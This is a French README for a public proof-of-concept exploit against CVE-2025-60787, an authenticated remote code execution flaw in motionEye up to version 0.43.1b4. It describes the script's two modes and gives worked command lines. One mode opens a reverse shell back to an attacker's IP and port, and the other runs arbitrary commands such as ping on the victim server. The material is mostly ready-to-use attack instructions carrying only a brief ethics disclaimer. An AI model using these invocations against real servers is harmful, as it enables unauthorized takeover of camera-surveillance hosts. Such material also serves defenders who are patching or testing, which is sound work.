
PoC automatisé pour CVE-2025-60787 fournissant une exécution de code à distance authentifiée contre les serveurs motionEye jusqu'à 0.43.1b4, avec les modes shell inversé et exécution de commande.
PoC pour CVE-2025-60787 qui est une vulnérabilité RCE authentifiée pour motionEye avec toutes les versions affectées jusqu'à 0.43.1b4 (incluse).
Ceci est un PoC automatisé pour la vulnérabilité décrite dans ce dépôt. Remerciements à prabhatverma47.
Le script a 2 commandes qui exploitent la vulnérabilité. L'une qui envoie directement un reverse shell appelée revshell et une autre commande appelée command pour exécuter directement des commandes en exploitant cette CVE.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
Utilisez la commande revshell pour obtenir un shell. Par exemple :
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
Où 10.10.10.10 est la machine cible (machine exécutant motionEye), 10.10.10.15 est notre machine attaquante et 9001 est le port sur lequel nous écoutons pour recevoir un reverse shell.
Si au lieu d'un reverse shell nous voulons exécuter d'autres commandes à distance, nous pouvons utiliser l'option command. Par exemple, exécutez la commande ping -c1 10.10.10.15 sur la machine victime :
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
Où 10.10.10.10 est la machine exécutant motionEye.
Utilisez toujours ce script sous votre propre responsabilité.
Soyez éthique (: